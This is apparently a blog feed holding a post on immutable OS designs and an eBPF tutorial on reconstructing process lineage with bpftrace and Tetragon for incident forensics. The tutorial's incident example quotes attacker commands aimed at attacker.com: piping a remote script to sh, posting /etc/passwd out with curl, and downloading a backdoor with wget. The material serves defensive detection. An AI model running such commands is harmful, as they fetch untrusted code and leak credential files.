Convergence is not the same as prevention. A config-management run that fires every 30 minutes still leaves a window of up to 30 minutes in which the system can be anything. And convergence tools can only fix drift they know to look for: an ad-hoc apt install that isn’t in anyone’s playbook just sits there, invisible, until someone happens to notice.

Immutable OS designs remove the window entirely. If the root filesystem is mounted read-only, apt install on a running node doesn’t drift the system — it fails, because there’s nowhere to write the new package. The only way to add that package is to build a new image and boot into it. Prevention replaces convergence.
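A quick way to see which side of that line a node is on is to ask the kernel whether a path sits on a read-only mount. The sketch below is a minimal illustration using Python's os.statvfs; the list of paths is an assumption for demonstration (ostree-based systems typically keep /usr read-only while /etc and /var stay writable), and it only reports mount flags, it does not prove the whole OS is immutable.

```python
import os


def is_read_only(path: str = "/usr") -> bool:
    """Return True if the filesystem holding `path` is mounted read-only."""
    flags = os.statvfs(path).f_flag
    return bool(flags & os.ST_RDONLY)


if __name__ == "__main__":
    # Paths chosen for illustration; adjust for your distro's layout.
    for mount in ("/", "/usr", "/etc", "/var"):
        if os.path.exists(mount):
            state = "read-only" if is_read_only(mount) else "writable"
            print(f"{mount:<6} {state}")
```

On a traditional mutable host every line usually prints "writable"; on an image-based host the OS paths are expected to report "read-only".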

How Atomic Updates Actually Work

Left: a hardened golden image drifts once it’s live on a mutable root filesystem. Right: an immutable OS stages the next image fully before swapping to it atomically, with rollback as a first-class operation.

The core mechanism, used by ostree-based systems (Fedora CoreOS, Silverblue) and bootc alike, is A/B deployment:

1. Two deployment slots exist on disk at all times. Call them A (active) and B (staged). Only one is booted at a time.
2. An update downloads and assembles the entire new OS image into the inactive slot. This can take minutes. The running system is completely unaffected while it happens: there is no partial state visible to production traffic.
3. The bootloader entry swaps atomically. This is a single operation, not a sequence of file writes: the system either boots the new deployment on next reboot, or it doesn’t. There’s no window where half the files are new and half are old.
4. If the new deployment fails to boot or fails a health check, rolling back means booting the previous slot. The old deployment was never deleted, never modified. It’s still exactly what it was before the update.

# Check current and staged deployments
$ rpm-ostree status
State: idle
Deployments:
● ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240210.3.0 (2024-02-10T09:14:22Z)
                   Commit: 8f2a1c...

  ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240115.2.0 (2024-01-15T11:02:03Z)
                   Commit: 3b7e9d...

# Roll back to the previous deployment — no rebuild, no reinstall
$ rpm-ostree rollback
Moving 'ostree://fedora:fedora/38/x86_64/coreos' (38.20240115.2.0) to be first deployment
Run "systemctl reboot" to start a rollback

$ systemctl reboot

The ● marks the currently booted deployment. The second entry never disappeared when the update landed: it’s exactly the filesystem that was running before the update, byte for byte, ready to boot again.
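The "single operation" behind an atomic swap can be illustrated in user space with a symlink and a rename. This is only a sketch of the general pattern, not the actual ostree or bootc code: the directory names deploy-a and deploy-b and the link name current are hypothetical, and a real system swaps bootloader configuration rather than a link in a temp directory.

```python
import os
import tempfile


def atomic_switch(link_path: str, new_target: str) -> None:
    """Point link_path at new_target with one atomic rename."""
    tmp_link = link_path + ".tmp"
    # Clear a leftover temp link from an interrupted earlier run.
    if os.path.lexists(tmp_link):
        os.remove(tmp_link)
    os.symlink(new_target, tmp_link)
    # rename(2) replaces the old link in one step: readers see the old
    # target or the new one, never a missing or half-written link.
    os.replace(tmp_link, link_path)


def demo() -> list:
    """Boot A, stage and switch to B, then roll back to A."""
    seen = []
    with tempfile.TemporaryDirectory() as root:
        for slot in ("deploy-a", "deploy-b"):
            os.mkdir(os.path.join(root, slot))
        current = os.path.join(root, "current")
        atomic_switch(current, "deploy-a")
        seen.append(os.readlink(current))
        # Update: deploy-b is fully assembled before the switch happens.
        atomic_switch(current, "deploy-b")
        seen.append(os.readlink(current))
        # Rollback: deploy-a was never modified, so switching back is enough.
        atomic_switch(current, "deploy-a")
        seen.append(os.readlink(current))
    return seen


if __name__ == "__main__":
    print(demo())
```

The point of the design is that all slow work (download, assembly) happens before the switch, and the switch itself has no intermediate state to get stuck in.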

bootc — covered in depth in EP04 — applies the same A/B model but defines the OS image as an OCI container image, built with a standard Containerfile and pushed to a normal container registry. The deployment mechanism is the same; the packaging format is the one most infrastructure teams already have tooling for.

What You Give Up, and What You Get Back

	Traditional mutable OS	Immutable OS
`apt install`/`dnf install` on a running node	Works, silently drifts the system	Fails — no writable path for it to take
Config-management convergence loop	Required to fight drift	Not needed — nothing to converge
“What changed since deployment?”	Shell history, playbook logs, guesswork	`rpm-ostree status` / `bootc status` — exact, versioned answer
Undoing a bad update	Reinstall, restore from backup, or manual repair	One command, one reboot
Auditing compliance months later	Grade describes the image, not the running system	Grade describes the running system, because it can’t have changed
Debugging tools installed ad hoc	Common, invisible in inventory	Requires a new image — visible in version control

The trade-off is real: an immutable OS removes a workflow a lot of engineers rely on — the quick SSH fix. That’s not a bug in the design. It’s the entire point. If the quick fix is impossible, it can’t happen accidentally, and it can’t happen without going through review.

Three Ways This Actually Ships Today

This series covers each of these in depth over the coming episodes — for now, know they exist and roughly where each one fits:

Fedora CoreOS / Silverblue (EP03) — ostree-based, general-purpose immutable Linux. CoreOS targets servers and container hosts; Silverblue targets immutable desktops. Both use rpm-ostree for the deployment model shown above.
bootc (EP04) — an immutable OS image defined as a container image and booted directly, no separate “OS build” toolchain from your application build toolchain. Newer, and increasingly the direction RHEL-family distros are heading.
Talos Linux (EP05) — purpose-built for Kubernetes nodes. No SSH, no shell, no package manager at all — the only interface is an API (talosctl). The most aggressive point on this spectrum: not just read-only, but no interactive access whatsoever.

None of these require you to abandon Stratum. A bootc image or a Fedora CoreOS image can still be built from a hardened, CIS-benchmarked base — the hardening pipeline and the immutability model solve different problems and compose cleanly.

Production Gotchas

Immutability doesn’t mean “no state.” /etc and /var are typically still writable on ostree-based systems (application data, logs, local config overrides have to live somewhere). “Immutable” means the OS binaries and base configuration can’t be mutated in place — read the docs for your specific distro to know exactly what’s writable.

Rollback isn’t instant if you don’t test it first. rpm-ostree rollback works, but if you’ve never practiced it, the first time you run it under incident pressure is the wrong time to discover a health check you forgot to configure. Rehearse rollback the same way you’d rehearse a database failover.

Container image tooling doesn’t automatically make an OS image safe. bootc images are built like container images, which means it’s easy to accidentally treat them like disposable containers instead of long-lived OS deployments — with all the patching and lifecycle discipline that implies.

Not everything you run today has an immutable-OS story yet. Legacy configuration management (Puppet/Chef agents that expect to write to /etc continuously) and some monitoring agents assume a mutable filesystem. Check compatibility before you migrate a fleet.

Quick Reference

# ostree/rpm-ostree (Fedora CoreOS, Silverblue)
rpm-ostree status                  # current + staged deployments
rpm-ostree upgrade                 # stage the next image
rpm-ostree rollback                # revert to the previous deployment
ostree admin status                # lower-level deployment inspection

# bootc
bootc status                       # current + staged image, digest-pinned
bootc upgrade                      # pull and stage the next image
bootc rollback                     # revert to the previous deployment

# Talos Linux (API-only, no shell)
talosctl version                   # node + API version
talosctl get machineconfig         # current applied config
talosctl upgrade --image $IMAGE    # stage a new node image ($IMAGE = installer image reference)

Key Takeaways

A hardened image is a build-time guarantee; an immutable OS is what makes that guarantee hold at runtime too
Atomic A/B deployment means the system is never caught half-updated, and the previous deployment is always intact for rollback
Config-management convergence fights drift on a schedule; immutability removes the writable path drift needs to happen at all
rpm-ostree/bootc give you an exact, versioned answer to “what changed” instead of shell history and guesswork
This composes with Stratum’s hardening pipeline — it doesn’t replace it

What’s Next

EP01 established the gap: hardening proves an image correct once, at build time, and a mutable root filesystem gives that proof an expiration date nobody tracks. EP02 goes one level deeper into the mechanism that closes it — exactly how ostree and bootc implement atomic A/B updates under the hood, including how the bootloader is involved and what “atomic” actually guarantees.

Next: EP02 — Atomic OS Updates Explained: How ostree and bootc Actually Work

Get EP02 in your inbox when it publishes → linuxcent.com/subscribe

The post What Is an Immutable OS — and Why Hardening Isn’t Enough appeared first on Linuxcent.

Process Lineage — Reconstructing What Happened After the Fact

Vamshi Krishna Santhapuri — Thu, 18 Jun 2026 02:00:00 +0000

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() path runs, capturing process name, PID, parent PID, and arguments inside the kernel, so the record does not depend on a userspace observer that could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage. Tetragon persists a kernel-side cache of the process tree in BPF maps, while Falco reconstructs lineage in userspace from its syscall event stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}
interval:s:10 { exit(); }   // stop after 10 seconds
'

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment: you get PIDs and process names, but pod names and namespaces require the extra /proc/[pid]/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              ├── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
              └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (file permission and capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. Leaves the PID unchanged: execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.
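The fork and exec rules above can be checked from user space. The following is a minimal sketch, assuming a Linux host with Python 3: it forks, has the child exec a fresh interpreter, and compares the PID the new program reports with the value fork() returned to the parent. The function name fork_then_exec and the dictionary keys are made up for this illustration.

```python
import os
import sys


def fork_then_exec() -> dict:
    """Fork a child, exec a new program in it, and report the PIDs involved."""
    read_fd, write_fd = os.pipe()
    parent_pid = os.getpid()
    child_pid = os.fork()  # parent receives the child's PID, child receives 0
    if child_pid == 0:
        # Child: route stdout into the pipe, then replace the process image.
        try:
            os.close(read_fd)
            os.dup2(write_fd, 1)
            probe = "import os; print(os.getpid(), os.getppid())"
            os.execv(sys.executable, [sys.executable, "-c", probe])
        finally:
            os._exit(127)  # only reached if exec failed
    # Parent: read what the exec'd program says about itself.
    os.close(write_fd)
    with os.fdopen(read_fd) as pipe:
        reported_pid, reported_ppid = map(int, pipe.read().split())
    os.waitpid(child_pid, 0)
    return {
        "parent_pid": parent_pid,
        "fork_returned": child_pid,
        "pid_after_exec": reported_pid,
        "ppid_after_exec": reported_ppid,
    }


if __name__ == "__main__":
    print(fork_then_exec())
```

The PID reported after exec matches what fork() returned, and the parent PID still points at the original process. That pair of facts is what lets fork and exec events be stitched into one tree.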

Building the Process Tree with kprobes

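The two core hooks for process lineage, shown here as syscall tracepoints rather than kprobes because tracepoints are a stable kernel interface: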

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (args->ret > 0) {
        // args->ret is the child PID (from the parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, args->ret, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=",
           pid,
           curtask->real_parent->tgid,
           str(args->filename));
    join(args->argv);   // prints the full argv; str(*args->argv) would yield only argv[0]
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

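To inspect Tetragon’s process cache directly (map names and value layouts differ between Tetragon versions, so treat the names and output below as illustrative):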

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod. It is the same path as /proc/[pid]/cgroup, but captured at exec time and stored in kernel space.
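Turning a cgroup path into a pod UID is mostly a pattern match. The sketch below assumes the two common kubelet layouts (cgroupfs driver, with dashes in the UID, and systemd driver, with underscores); the sample paths and UID are invented for illustration, and other runtimes may lay paths out differently.

```python
import re
from typing import Optional

# "pod" followed by a UUID whose separators are "-" (cgroupfs) or "_" (systemd).
_POD_UID = re.compile(r"pod([0-9a-f]{8}(?:[-_][0-9a-f]{4}){3}[-_][0-9a-f]{12})")


def pod_uid_from_cgroup(cgroup_path: str) -> Optional[str]:
    """Extract the Kubernetes pod UID from a cgroup path, or None if absent."""
    match = _POD_UID.search(cgroup_path)
    if match is None:
        return None
    return match.group(1).replace("_", "-")


def pod_uid_for_pid(pid: int) -> Optional[str]:
    """Read /proc/[pid]/cgroup and return the first pod UID found in it."""
    with open(f"/proc/{pid}/cgroup") as handle:
        for line in handle:
            uid = pod_uid_from_cgroup(line)
            if uid:
                return uid
    return None


if __name__ == "__main__":
    # Hypothetical sample paths, one per cgroup driver.
    samples = [
        "/kubepods/burstable/pod3f8a21bc-0d4e-4c1a-9b7e-5a6f7c8d9e01/abc123",
        "/kubepods.slice/kubepods-burstable.slice/"
        "kubepods-burstable-pod3f8a21bc_0d4e_4c1a_9b7e_5a6f7c8d9e01.slice/x.scope",
        "/system.slice/sshd.service",
    ]
    for path in samples:
        print(pod_uid_from_cgroup(path))
```

The UID can then be matched against metadata.uid from the Kubernetes API to recover the pod name and namespace.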

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["host_ns"]    # exclude the host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PIDs 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is precise to the millisecond because the events are timestamped by the kernel at the hook point.
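The cross-reference step can be sketched as a join between connection events and exec events, walking parent PIDs upward. The event dictionaries below are a simplified, hypothetical shape (not Tetragon's actual JSON schema), populated with the PIDs from the example above.

```python
from typing import Dict, List

# Simplified events: field names are assumptions made for this sketch.
EXEC_EVENTS = [
    {"pid": 18293, "ppid": 18201, "binary": "/bin/sh"},
    {"pid": 18294, "ppid": 18293, "binary": "/bin/sh"},
    {"pid": 18296, "ppid": 18294, "binary": "/usr/bin/curl"},
    {"pid": 18297, "ppid": 18294, "binary": "/usr/bin/wget"},
]
CONNECT_EVENTS = [
    {"pid": 18296, "dst": "93.184.216.34"},
    {"pid": 18297, "dst": "93.184.216.34"},
]


def ancestry(pid: int, execs: Dict[int, dict]) -> List[str]:
    """Walk parent links from pid up to the first process with no exec event."""
    chain, seen = [], set()
    while pid in execs and pid not in seen:
        seen.add(pid)  # guards against a loop in malformed data
        chain.append(f"{execs[pid]['binary']}({pid})")
        pid = execs[pid]["ppid"]
    chain.append(f"pid {pid}")  # ancestor that predates the recording
    return list(reversed(chain))


def attribute(connects: List[dict], exec_events: List[dict]) -> List[dict]:
    """Attach the full process lineage to every connection event."""
    by_pid = {event["pid"]: event for event in exec_events}
    return [
        {"dst": c["dst"], "lineage": " -> ".join(ancestry(c["pid"], by_pid))}
        for c in connects
    ]


if __name__ == "__main__":
    for row in attribute(CONNECT_EVENTS, EXEC_EVENTS):
        print(row["dst"], "<=", row["lineage"])
```

This version keys on the bare PID for brevity. On a busy node the lookup should also take start time into account, since PIDs get reused.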

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

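Sample output (illustrative; nsecs is nanoseconds since boot on the kernel’s monotonic clock, so it orders events reliably but is not wall-clock time):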

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.
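Grouping by ppid and ordering by timestamp is a few lines of post-processing. The sketch below parses the log format produced by the recorder above and renders an indented tree; the sample text is the output shown earlier, and the function names are invented for this example. It ignores PID reuse and EXIT lines, so treat it as a starting point rather than a forensic tool.

```python
import re
from collections import defaultdict

EXEC_RE = re.compile(r"^(\d+)\s+EXEC\s+pid=(\d+)\s+ppid=(\d+)\s+binary=(\S+)")

SAMPLE_LOG = """\
1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
"""


def build_tree(log_text):
    """Return (children, binaries) built from EXEC lines in timestamp order."""
    events = []
    for line in log_text.splitlines():
        match = EXEC_RE.match(line.strip())
        if match:
            ts, pid, ppid = (int(match.group(i)) for i in (1, 2, 3))
            events.append((ts, pid, ppid, match.group(4)))
    events.sort()  # order by timestamp
    children, binaries = defaultdict(list), {}
    for _ts, pid, ppid, binary in events:
        if pid not in children[ppid]:  # a PID may exec more than once
            children[ppid].append(pid)
        binaries[pid] = binary  # keep the most recent binary for the PID
    return children, binaries


def _render(children, binaries, pid, depth):
    lines = [f"{'  ' * depth}{binaries.get(pid, 'unknown')} ({pid})"]
    for child in children.get(pid, []):
        lines.extend(_render(children, binaries, child, depth + 1))
    return lines


def render_forest(log_text):
    """Render one tree per parent that has no exec event of its own."""
    children, binaries = build_tree(log_text)
    lines = []
    for root in sorted(p for p in children if p not in binaries):
        lines.extend(_render(children, binaries, root, 0))
    return lines


if __name__ == "__main__":
    print("\n".join(render_forest(SAMPLE_LOG)))
```

The root shows as "unknown" because the parent application started before the recorder did; only its children appear in the log.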

Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace’s comm built-in has the same limit. For the full binary path, read from execve’s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s exported events handle this by identifying each process with an exec ID derived from PID and start time, not the bare PID.
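One way to make correlation robust against PID reuse is to keep every (PID, start time) pair and resolve an event to whichever process owned the PID at the event's timestamp. The class below is a minimal sketch of that idea with made-up names and timestamps; it is not how any particular tool stores its cache.

```python
import bisect
from collections import defaultdict
from typing import Optional


class ProcessHistory:
    """Remembers every process that has held a PID, keyed by start time."""

    def __init__(self) -> None:
        self._starts = defaultdict(list)  # pid -> sorted list of start times
        self._binary = {}                 # (pid, start_ns) -> binary path

    def record_start(self, pid: int, start_ns: int, binary: str) -> None:
        bisect.insort(self._starts[pid], start_ns)
        self._binary[(pid, start_ns)] = binary

    def owner_at(self, pid: int, event_ns: int) -> Optional[str]:
        """Return the binary that owned `pid` when the event happened."""
        starts = self._starts.get(pid, [])
        index = bisect.bisect_right(starts, event_ns)
        if index == 0:
            return None  # event predates every known owner of this PID
        return self._binary[(pid, starts[index - 1])]


if __name__ == "__main__":
    history = ProcessHistory()
    history.record_start(18296, 100, "/usr/bin/curl")    # attacker process
    history.record_start(18296, 900, "/usr/sbin/nginx")  # PID reused later
    print(history.owner_at(18296, 500))
    print(history.owner_at(18296, 950))
```

An event at time 500 resolves to curl and one at 950 to nginx, even though both carry PID 18296.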

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event records the new binary under the same PID, and the parent link is unchanged. A single PID can therefore map to several binaries over its lifetime. Don’t rely on comm alone for process identity; keep every exec event for a PID, not just the latest one.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list | grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/$PID/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (args->ret > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

The post Process Lineage — Reconstructing What Happened After the Fact appeared first on Linuxcent.

DNS at the Kernel Level — What Your Pods Are Actually Resolving

Vamshi Krishna Santhapuri — Sat, 06 Jun 2026 02:00:00 +0000

